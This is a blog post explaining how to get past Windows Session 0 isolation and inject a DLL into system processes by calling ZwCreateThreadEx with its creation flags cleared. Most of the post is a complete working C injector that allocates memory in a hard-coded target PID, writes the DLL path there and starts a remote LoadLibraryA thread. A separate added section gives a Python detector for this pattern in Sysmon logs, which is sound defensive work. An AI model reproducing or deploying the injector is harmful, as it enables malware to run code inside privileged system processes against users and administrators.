idiotc4t's blog
Bypass Session 0 Injection

Introduction

With traditional process injection techniques we can inject shellcode or a DLL into an ordinary user process. If we go one step further and try to inject into a system process, the attempt usually fails because of Session 0 isolation. This article describes how to get past Session 0 isolation and inject into system processes.

The ZwCreateThreadEx function

Creating a remote thread with CreateRemoteThread worked without problems before NT kernel 6.0, but 6.0 introduced the session isolation mechanism: a newly created thread is first suspended, and the system then checks whether it runs in its own session before deciding whether to resume it.
ZwCreateThreadEx is closer to the kernel than CreateRemoteThread; CreateRemoteThread itself ultimately calls ZwCreateThreadEx to create the thread. Earlier research that reverse-engineered CreateRemoteThread found that its internal call to ZwCreateThreadEx sets the seventh parameter, the creation flags, to 1, which leaves the created thread suspended; this is why the injection fails.
So for the created thread to actually run, we need to pass 0 as the seventh parameter, so that the thread executes once it has been created.
The ZwCreateThreadEx prototype is no different between 32-bit and 64-bit.
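As an added defender-side example (not part of the original post), this is the detection logic a SOC would run over Sysmon Event ID 8 (CreateRemoteThread) records for the pattern this section describes: a user-session process creating a remote thread in a Session 0 process, with the thread starting at a DLL loader. The field names are Sysmon's; the sample events and the pid-to-session map are constructed, and the session enrichment is an assumption.

```python
from dataclasses import dataclass

# Constructed Sysmon Event ID 8 (CreateRemoteThread) records. Sysmon observes
# the new thread at kernel level, so threads started through ZwCreateThreadEx
# show up here exactly like those started through CreateRemoteThread.
SAMPLE_EVENTS = [
    {"SourceProcessId": 4321, "SourceImage": r"C:\Users\demo\inject.exe",
     "TargetProcessId": 1516, "TargetImage": r"C:\Windows\System32\svchost.exe",
     "StartModule": r"C:\Windows\System32\KERNEL32.DLL", "StartFunction": "LoadLibraryA"},
    {"SourceProcessId": 2200, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetProcessId": 3300, "TargetImage": r"C:\Windows\explorer.exe",
     "StartModule": r"C:\Windows\System32\ntdll.dll", "StartFunction": "RtlUserThreadStart"},
    {"SourceProcessId": 5100, "SourceImage": r"C:\Program Files\Vendor\av.exe",
     "TargetProcessId": 3300, "TargetImage": r"C:\Windows\explorer.exe",
     "StartModule": r"C:\Windows\System32\KERNEL32.DLL", "StartFunction": "LoadLibraryW"},
]

# Constructed pid -> session id map (assumption: enriched on the host with
# ProcessIdToSessionId or taken from an EDR process inventory).
SESSION_OF = {4321: 1, 1516: 0, 2200: 0, 3300: 1, 5100: 1}

# Start functions typical of DLL injection via a remote thread.
LOADER_STARTS = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW"}


@dataclass
class Finding:
    source_pid: int
    target_pid: int
    severity: str
    reason: str


def analyze(events, session_of):
    """Return findings for remote threads created from a user session into Session 0."""
    findings = []
    for ev in events:
        src = session_of.get(ev["SourceProcessId"])
        dst = session_of.get(ev["TargetProcessId"])
        if src is None or dst is None:
            continue  # no session enrichment, cannot judge this event
        if src == 0 or dst != 0:
            continue  # same-session threads and threads made by Session 0 itself are out of scope
        if ev["StartFunction"] in LOADER_STARTS:
            findings.append(Finding(ev["SourceProcessId"], ev["TargetProcessId"], "high",
                                    "user-session process started a DLL-loader thread in a Session 0 process"))
        else:
            findings.append(Finding(ev["SourceProcessId"], ev["TargetProcessId"], "medium",
                                    "user-session process created a remote thread in a Session 0 process"))
    return findings
```

Only the first constructed event is reported: the csrss.exe thread originates in Session 0 and the av.exe thread stays inside Session 1.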

Code implementation

This injection technique is very similar to the classic WriteProcessMemory + CreateRemoteThread injection; the only change is that the function used to create the thread is ZwCreateThreadEx instead of CreateRemoteThread.
```c
#include <Windows.h>
#include <stdio.h>

// ZwCreateThreadEx is undocumented and is resolved from ntdll.dll at run time.
// The seventh parameter is the creation flags: 1 creates the thread suspended
// (what CreateRemoteThread passes internally), 0 lets it run immediately.
#ifdef _WIN64
typedef DWORD(WINAPI* typedef_ZwCreateThreadEx)(
    PHANDLE ThreadHandle,
    ACCESS_MASK DesiredAccess,
    LPVOID ObjectAttributes,
    HANDLE ProcessHandle,
    LPTHREAD_START_ROUTINE lpStartAddress,
    LPVOID lpParameter,
    ULONG CreateThreadFlags,
    SIZE_T ZeroBits,
    SIZE_T StackSize,
    SIZE_T MaximumStackSize,
    LPVOID pUnkown);
#else
typedef DWORD(WINAPI* typedef_ZwCreateThreadEx)(
    PHANDLE ThreadHandle,
    ACCESS_MASK DesiredAccess,
    LPVOID ObjectAttributes,
    HANDLE ProcessHandle,
    LPTHREAD_START_ROUTINE lpStartAddress,
    LPVOID lpParameter,
    BOOL CreateSuspended,
    DWORD dwStackSize,
    DWORD dw1,
    DWORD dw2,
    LPVOID pUnkown);
#endif

typedef DWORD(WINAPI* typedef_LoadLibraryA)(char* path);

/*
BOOL EnbalePrivileges(HANDLE hProcess, char* pszPrivilegesName)
{
    HANDLE hToken = NULL;
    LUID luidValue = { 0 };
    TOKEN_PRIVILEGES tokenPrivileges = { 0 };
    BOOL bRet = FALSE;

    bRet = OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES, &hToken);
    bRet = LookupPrivilegeValue(NULL, pszPrivilegesName, &luidValue);

    tokenPrivileges.PrivilegeCount = 1;
    tokenPrivileges.Privileges[0].Luid = luidValue;
    tokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    bRet = AdjustTokenPrivileges(hToken, FALSE, &tokenPrivileges, 0, NULL, NULL);

    return TRUE;
}*/

int main(int argc, char* argv[]) {
    //EnbalePrivileges(GetCurrentProcess(), SE_DEBUG_NAME);

    // Path of the DLL to load in the target; sizeof() already counts the terminating NUL.
    char DllPath[] = "C:\\Users\\Black Sheep\\source\\repos\\sesion0\\x64\\Debug\\TestDll.dll";
    HANDLE hRemoteThread = NULL;

    // GetModuleHandleA returns an HMODULE (not a HANDLE) and does not take a
    // reference on the module, so no FreeLibrary is paired with it.
    HMODULE hNtModule = GetModuleHandleA("ntdll.dll");
    HMODULE hKeModule = GetModuleHandleA("Kernel32.dll");
    if (hNtModule == NULL || hKeModule == NULL) {
        printf("GetModuleHandleA failed: %lu\n", GetLastError());
        return 1;
    }

    // GetProcAddress returns FARPROC; the casts to the typedefs above are required.
    typedef_ZwCreateThreadEx ZwCreateThreadEx =
        (typedef_ZwCreateThreadEx)GetProcAddress(hNtModule, "ZwCreateThreadEx");
    typedef_LoadLibraryA myLoadLibraryA =
        (typedef_LoadLibraryA)GetProcAddress(hKeModule, "LoadLibraryA");
    if (ZwCreateThreadEx == NULL || myLoadLibraryA == NULL) {
        printf("GetProcAddress failed: %lu\n", GetLastError());
        return 1;
    }

    // Target process id as hard-coded in the original post.
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, 1516);
    if (hProcess == NULL) {
        printf("OpenProcess failed: %lu\n", GetLastError());
        return 1;
    }

    LPVOID lpBaseAddress = VirtualAllocEx(hProcess, NULL, sizeof(DllPath), MEM_COMMIT, PAGE_READWRITE);
    if (lpBaseAddress == NULL) {
        printf("VirtualAllocEx failed: %lu\n", GetLastError());
        CloseHandle(hProcess);
        return 1;
    }
    WriteProcessMemory(hProcess, lpBaseAddress, DllPath, sizeof(DllPath), NULL);

    // Seventh argument (creation flags) is 0, so the thread is not created suspended.
    // THREAD_ALL_ACCESS is the access mask that applies to a thread object.
    ZwCreateThreadEx(&hRemoteThread, THREAD_ALL_ACCESS, NULL, hProcess,
                     (LPTHREAD_START_ROUTINE)myLoadLibraryA, lpBaseAddress, 0, 0, 0, 0, NULL);

    if (hRemoteThread != NULL) {
        CloseHandle(hRemoteThread);
    }
    CloseHandle(hProcess);
    return 0;
}
```

Links

《Windows黑客编程》 (Windows Hacker Programming)
What is Windows Session 0 Isolation and Interactive Services Detection?
Last updated 1yr ago